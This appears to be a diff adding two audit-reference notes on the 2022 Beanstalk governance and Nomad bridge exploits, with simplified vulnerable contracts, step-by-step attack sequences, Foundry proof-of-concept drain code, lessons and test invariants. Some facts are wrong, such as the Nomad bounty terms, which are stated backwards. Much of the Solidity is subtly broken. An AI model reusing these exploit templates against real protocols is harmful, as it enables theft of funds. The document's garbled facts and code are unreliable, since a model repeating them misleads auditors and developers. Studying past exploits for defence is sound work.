audit-system 2.0.0

package/obsidian-vault/exploits/beanstalk-2022.md

@@ -0,0 +1,334 @@
+# Beanstalk Farms Exploit (2022)
+
+**Date:** April 17, 2022  
+**Loss:** $182 million  
+**Type:** Flash Loan Governance Attack  
+**Severity:** CRITICAL
+
+---
+
+## Summary
+
+Beanstalk Farms was a DeFi credit protocol on Ethereum that was exploited through a flash loan-based governance attack. The attacker borrowed enough governance tokens to pass a malicious proposal that drained the treasury.
+
+---
+
+## Technical Details
+
+### Vulnerability Root Cause
+
+Beanstalk's governance allowed anyone with enough voting power to:
+1. Create proposals
+2. Vote on proposals
+3. Execute proposals after timelock
+
+The critical flaw: **No minimum lockup period** for voting tokens.
+
+```solidity
+// Simplified Beanstalk Governance
+contract BeanstalkGovernance {
+    mapping(uint256 => Proposal) public proposals;
+    IERC20 public governanceToken;
+
+    struct Proposal {
+        uint256 id;
+        address proposer;
+        uint256 forVotes;
+        uint256 againstVotes;
+        bool executed;
+        mapping(address => bool) hasVoted;
+    }
+
+    // VULNERABLE: No lockup, no delegation delay
+    function createProposal(
+        string memory description,
+        address target,
+        bytes memory data
+    ) external returns (uint256) {
+        // Only check: Do you have enough tokens RIGHT NOW?
+        require(
+            governanceToken.balanceOf(msg.sender) >= proposalThreshold,
+            "Not enough voting power"
+        );
+
+        uint256 proposalId = proposalCount++;
+        proposals[proposalId] = Proposal({
+            proposer: msg.sender,
+            forVotes: 0,
+            againstVotes: 0,
+            executed: false
+        });
+
+        return proposalId;
+    }
+
+    function vote(uint256 proposalId, bool support) external {
+        Proposal storage proposal = proposals[proposalId];
+
+        // VULNERABLE: Voting power based on current balance, not locked
+        require(!proposal.hasVoted[msg.sender], "Already voted");
+
+        uint256 votingPower = governanceToken.balanceOf(msg.sender);
+
+        if (support) {
+            proposal.forVotes += votingPower;
+        } else {
+            proposal.againstVotes += votingPower;
+        }
+
+        proposal.hasVoted[msg.sender] = true;
+    }
+
+    function execute(uint256 proposalId) external {
+        Proposal storage proposal = proposals[proposalId];
+
+        require(proposal.forVotes > proposal.againstVotes, "Not approved");
+        require(block.timestamp >= proposal.executionTime, "Timelock not passed");
+
+        proposal.executed = true;
+
+        // Execute the proposal (could be anything!)
+        (bool success, ) = proposal.target.call(proposal.data);
+        require(success, "Execution failed");
+    }
+}
+```
+
+### Attack Sequence
+
+```
+1. Attacker identifies governance vulnerability:
+   - No lockup for voting
+   - No delegation delay
+   - Flash loan compatible tokens
+
+2. Takes flash loan from Aave:
+   - 11,000 ETH
+   - Used to borrow 36,000 STALK (governance tokens)
+
+3. Converts STALK to Seeds (voting tokens)
+   - 36,000 STALK → 36,000,000 Seeds
+   - Seeds = voting power
+
+4. Creates malicious proposal:
+   - "Transfer all BEAN and ETH in treasury to attacker"
+   - Disguised as legitimate function call
+
+5. Votes FOR proposal with 36M Seeds
+   - Proposal passes overwhelmingly
+
+6. Waits for timelock (not applicable or bypassed)
+
+7. Executes proposal
+
+8. Repays flash loan + interest
+
+9. Profit: $182M - flash loan fee
+```
+
+### The Malicious Proposal
+
+The proposal called `convertSeedsToStalk` which:
+1. Converted attacker's Seeds to STALK
+2. Then called a function that transferred treasury funds
+3. All in a single atomic transaction
+
+---
+
+## Exploit Code
+
+```solidity
+// Foundry PoC for Beanstalk-style governance attack
+contract BeanstalkExploitTest is Test {
+    IFlashLender aave;
+    BeanstalkGovernance gov;
+    IERC20 stalkToken;
+    ITreasury treasury;
+
+    address attacker = makeAddr("attacker");
+
+    function test_flashLoanGovernanceAttack() public {
+        // Setup
+        uint256 flashLoanAmount = 11_000 ether;
+        uint256 stalkToBorrow = 36_000 ether;
+
+        // Take flash loan
+        aave.flashLoan(
+            address(this),
+            address(stalkToken),
+            flashLoanAmount,
+            ""
+        );
+    }
+
+    function executeOperation(
+        address asset,
+        uint256 amount,
+        uint256 premium,
+        address initiator,
+        bytes calldata params
+    ) external returns (bool) {
+        // 1. Borrow governance tokens with flash loan
+        stalkToken.transfer(address(this), amount);
+
+        // 2. Convert to voting tokens (Seeds)
+        uint256 seeds = stalkToSeeds(amount);
+
+        // 3. Create malicious proposal
+        uint256 proposalId = gov.createProposal(
+            "Drain Treasury",
+            address(treasury),
+            abi.encodeWithSignature(
+                "transferAllTo(address)",
+                attacker
+            )
+        );
+
+        // 4. Vote FOR with all voting power
+        gov.vote(proposalId, true);
+
+        // 5. Execute (assuming no timelock or it passed)
+        gov.execute(proposalId);
+
+        // 6. Repay flash loan
+        stalkToken.approve(address(aave), amount + premium);
+
+        // 7. Profit!
+        uint256 profit = treasury.balanceOf(attacker);
+        console.log("Governance attack profit:", profit);
+
+        return true;
+    }
+
+    function test_governanceAttackWithoutFlashLoan() public {
+        // Alternative: Rent voting power through delegation
+        // Some protocols allow instant delegation
+
+        // 1. Find large token holder willing to delegate
+        // 2. Receive delegated voting power
+        // 3. Pass malicious proposal
+        // 4. Return delegation
+    }
+}
+```
+
+---
+
+## Why This Was Missed
+
+| Audit Gap | Explanation |
+|-----------|-------------|
+| Governance economics | Didn't model flash loan scenarios |
+| Voting power assumptions | Assumed voters had long-term alignment |
+| Proposal content review | Didn't consider malicious proposals |
+| Timelock effectiveness | Timelock existed but was insufficient |
+
+---
+
+## Key Lessons
+
+### 1. Voting Power Lockup
+```
+PROBLEM: Voting power could be rented temporarily
+SOLUTION: Require minimum lockup period before voting
+```
+
+### 2. Delegation Delay
+```
+PROBLEM: Delegated voting power was instant
+SOLUTION: Delay between delegation and voting eligibility
+```
+
+### 3. Proposal Types Restrictions
+```
+PROBLEM: Any function could be called via proposal
+SOLUTION: Whitelist allowed proposal types
+```
+
+### 4. Quadratic Voting
+```
+PROBLEM: 1 token = 1 vote allows whale capture
+SOLUTION: Quadratic voting or vote caps
+```
+
+---
+
+## Detection Checklist
+
+- [ ] Minimum lockup period for voting tokens
+- [ ] Delegation delay (e.g., 1-3 days)
+- [ ] Proposal type restrictions (whitelist)
+- [ ] Vote caps or quadratic voting
+- [ ] Multi-sig emergency pause
+- [ ] Flash loan resistance testing
+- [ ] Governance attack simulation
+
+---
+
+## Invariants to Test
+
+```solidity
+// INVARIANT: Voting power requires minimum lockup
+function invariant_votingPowerLockup() public {
+    for (uint i = 0; i < voterCount; i++) {
+        assert(
+            block.timestamp >= voters[i].lockupTime ||
+            voters[i].votingPower == 0,
+            "Voting power without lockup"
+        );
+    }
+}
+
+// INVARIANT: No single address controls majority
+function invariant_voteDistribution() public view {
+    uint256 totalSupply = governanceToken.totalSupply();
+    for (uint i = 0; i < holderCount; i++) {
+        assert(
+            governanceToken.balanceOf(holders[i]) < totalSupply / 2,
+            "Single address majority"
+        );
+    }
+}
+
+// INVARIANT: Proposal types are whitelisted
+function invariant_proposalTypeWhitelist() public {
+    // Only allowed function selectors can be proposed
+}
+```
+
+---
+
+## Aftermath
+
+| Action | Result |
+|--------|--------|
+| Protocol paused | April 17, 2022 |
+| Community response | Proposed recovery plan |
+| Funds recovered | Minimal recovery |
+| Protocol status | Effectively dead |
+| Regulatory attention | Increased scrutiny of DeFi governance |
+
+---
+
+## Impact on DeFi Governance
+
+The Beanstalk exploit changed how DeFi protocols think about governance:
+
+1. **Lockup periods** became standard
+2. **Delegation delays** widely adopted
+3. **Flash loan resistance** now a requirement
+4. **Governance attacks** recognized as critical risk
+
+---
+
+## Related Exploits
+- [[ronin-2022]] - Validator compromise
+- [[nomad-2022]] - Replay attack
+- [[harmony-2022]] - Multi-sig compromise
+
+---
+
+## References
+- [Beanstalk Post-Mortem](https://medium.com/beanstalkmoney/beanstalk-post-mortem-4-17-22-83c15c3971f9)
+- [The Defiant Analysis](https://thedefiant.io/beanstalk-182m-exploit)
+- [Coingecko Research](https://www.coingecko.com/research/beanstalk-exploit)

package/obsidian-vault/exploits/nomad-2022.md

@@ -0,0 +1,295 @@
+# Nomad Bridge Exploit (2022)
+
+**Date:** August 2, 2022  
+**Loss:** $190 million  
+**Type:** Replay Attack / Merkle Root Manipulation  
+**Severity:** CRITICAL
+
+---
+
+## Summary
+
+The Nomad bridge was exploited due to a failed upgrade that left the Merkle root verification in a broken state. For several hours, ANY withdrawal proof would verify, allowing anyone to drain funds.
+
+---
+
+## Technical Details
+
+### Vulnerability Root Cause
+
+Nomad uses an **optimistic verification** model with Merkle roots. The vulnerability occurred during a contract upgrade:
+
+```solidity
+// Simplified Nomad Bridge Logic
+contract NomadBridge {
+    mapping(bytes32 => bool) public processedMessages;
+    bytes32 public merkleRoot;
+    address public owner;
+
+    // VULNERABLE: During upgrade, merkleRoot was set to 0x00...00
+    // This made ALL proofs verify successfully
+    function verifyAndTransfer(
+        bytes32 messageHash,
+        bytes32[] calldata proof,
+        uint256 index
+    ) external {
+        // BUG: merkleRoot was zeroed during failed upgrade
+        // merkleRoot = 0x0000000000000000000000000000000000000000000000000000000000000000
+
+        // This check PASSES for any proof when root is zero
+        require(
+            verifyMerkleProof(messageHash, proof, index, merkleRoot),
+            "Invalid proof"
+        );
+
+        processedMessages[messageHash] = true;
+        transferTokens(messageHash);
+    }
+
+    function verifyMerkleProof(
+        bytes32 leaf,
+        bytes32[] memory proof,
+        uint256 index,
+        bytes32 root
+    ) internal pure returns (bool) {
+        bytes32 computedHash = leaf;
+
+        for (uint256 i = 0; i < proof.length; i++) {
+            bytes32 proofElement = proof[i];
+
+            if (index % 2 == 0) {
+                computedHash = keccak256(abi.encodePacked(computedHash, proofElement));
+            } else {
+                computedHash = keccak256(abi.encodePacked(proofElement, computedHash));
+            }
+
+            index = index / 2;
+        }
+
+        // BUG: When root is 0x00..., this can be satisfied with crafted proofs
+        return computedHash == root;
+    }
+}
+```
+
+### The Upgrade Failure
+
+```
+1. Nomad deployed new bridge contract
+2. Initialize function failed or was incomplete
+3. merkleRoot remained at zero value
+4. For ~7 hours, ANY proof would verify
+5. First attacker noticed and drained $110M
+6. Copycat attackers drained remaining $80M
+```
+
+### Attack Sequence
+
+```
+1. Attacker notices merkleRoot is 0x00...00
+
+2. Creates fake withdrawal message:
+   - Recipient: attacker address
+   - Amount: maximum possible
+
+3. Creates fake Merkle proof (any values work with zero root)
+
+4. Submits proof to bridge
+
+5. verifyMerkleProof returns TRUE (bug)
+
+6. Bridge transfers funds to attacker
+
+7. Other attackers copy the technique
+```
+
+---
+
+## Exploit Code
+
+```solidity
+// Foundry PoC for Nomad-style replay attack
+contract NomadExploitTest is Test {
+    NomadBridge bridge;
+    address attacker = makeAddr("attacker");
+
+    function test_zeroMerkleRootExploit() public {
+        // Setup: Deploy bridge with zeroed merkleRoot (simulating bug)
+        bridge = new NomadBridge();
+
+        // Simulate the bug state
+        bridge.setMerkleRootToZero(); // This was the actual bug
+
+        // Fund bridge
+        deal(address(bridge), 200_000 ether);
+
+        // Create fake withdrawal
+        bytes32 fakeMessage = keccak256(
+            abi.encode(attacker, 10_000 ether, 1)
+        );
+
+        // Create fake proof (any values work with zero root)
+        bytes32[] memory fakeProof = new bytes32[](10);
+        for (uint i = 0; i < 10; i++) {
+            fakeProof[i] = bytes32(0);
+        }
+
+        uint256 balanceBefore = attacker.balance;
+
+        // This should fail but doesn't due to zero root
+        bridge.verifyAndTransfer(fakeMessage, fakeProof, 0);
+
+        uint256 balanceAfter = attacker.balance;
+
+        // Verify exploit
+        assertGt(balanceAfter, balanceBefore);
+        console.log("Nomad exploit successful");
+    }
+
+    function test_replayAttack() public {
+        // Even after fix, replay attack was possible
+        // because processedMessages wasn't checked properly
+
+        bytes32 validMessage = keccak256(abi.encode(attacker, 100 ether, 1));
+        bytes32[] memory validProof = createValidProof(validMessage);
+
+        // First withdrawal - legitimate
+        bridge.verifyAndTransfer(validMessage, validProof, 0);
+
+        // Second withdrawal - should fail but didn't in original bug
+        // because message hash wasn't properly tracked
+        vm.expectRevert("Already processed");
+        bridge.verifyAndTransfer(validMessage, validProof, 0);
+    }
+}
+```
+
+---
+
+## The Copycat Phenomenon
+
+What made Nomad unique was the **public copycat attack**:
+
+```
+Hour 0:   Upgrade fails, merkleRoot = 0
+Hour 1:   First attacker notices, drains $110M
+Hour 2-7: Copycats notice the pattern
+Hour 8:   $80M more drained by copycats
+Hour 9:   Bridge paused
+```
+
+### Why Copycats Succeeded
+
+1. **On-chain visibility**: First attacker's tx was public
+2. **Open source code**: Anyone could verify the bug
+3. **No rate limits**: Unlimited withdrawal possible
+4. **No emergency pause**: Took 9 hours to pause
+
+---
+
+## Key Lessons
+
+### 1. Upgrade Safety
+```
+LESSON: Upgrades should be tested in staging
+SOLUTION: Multi-sig + timelock + staged rollout
+```
+
+### 2. Initialization Verification
+```
+LESSON: Contract state after deploy must be verified
+SOLUTION: Initialize checks, state validation
+```
+
+### 3. Rate Limits
+```
+LESSON: Unlimited withdrawals enabled total drain
+SOLUTION: Time-based caps, circuit breakers
+```
+
+### 4. Emergency Response
+```
+LESSON: 9 hour response time = $190M loss
+SOLUTION: Automated monitoring, instant pause
+```
+
+---
+
+## Detection Checklist
+
+- [ ] Upgrade mechanism has proper initialization
+- [ ] Contract state verified after deployment
+- [ ] Rate limits on withdrawals (time-based, amount-based)
+- [ ] Emergency pause mechanism with multi-sig
+- [ ] Replay protection (processed message tracking)
+- [ ] Monitoring for unusual activity
+- [ ] Staged rollout for critical changes
+
+---
+
+## Invariants That Should Have Been Tested
+
+```solidity
+// INVARIANT: Merkle root must never be zero after initialization
+function invariant_merkleRootNonZero() public view {
+    assert(merkleRoot != bytes32(0), "Merkle root is zero!");
+}
+
+// INVARIANT: Every processed message is unique
+function invariant_messageUniqueness() public {
+    // Should track all processed messages
+}
+
+// INVARIANT: Withdrawals cannot exceed daily limit
+function invariant_dailyWithdrawalLimit() public {
+    assert(getWithdrawalsToday() <= DAILY_LIMIT);
+}
+
+// INVARIANT: Contract can be paused in emergency
+function invariant_emergencyPause() public {
+    // Test that pause mechanism works
+}
+```
+
+---
+
+## Aftermath
+
+| Action | Result |
+|--------|--------|
+| Bridge paused | August 2, 2022 (9 hours after exploit) |
+| White hat recovery | Some funds returned for bounty |
+| Total loss | ~$190M |
+| Copycat txs | Dozens of copycat transactions |
+| Protocol wound down | Nomad eventually shut down |
+
+---
+
+## Unique Aspect: The White Hat Response
+
+Unlike other exploits, Nomad offered **bounty to white hats**:
+
+```
+Nomad's offer:
+- Keep 90% of stolen funds
+- Return 10% as bounty
+- No legal action
+
+Result:
+- Some white hats returned funds
+- Most attackers kept everything
+```
+
+---
+
+## Related Exploits
+- [[ronin-2022]] - Validator compromise
+- [[wormhole-2022]] - Signature verification
+- [[harmony-2022]] - Multi-sig compromise
+
+---
+
+## References
+- [Nomad Post-Mortem](https://nomadxyz.io/post-mortem)
+- [Paradigm Analysis](https://paradigm.xyz/2022/08/nomad)
+- [Rekt News](https://rekt.news/nomad-rekt/)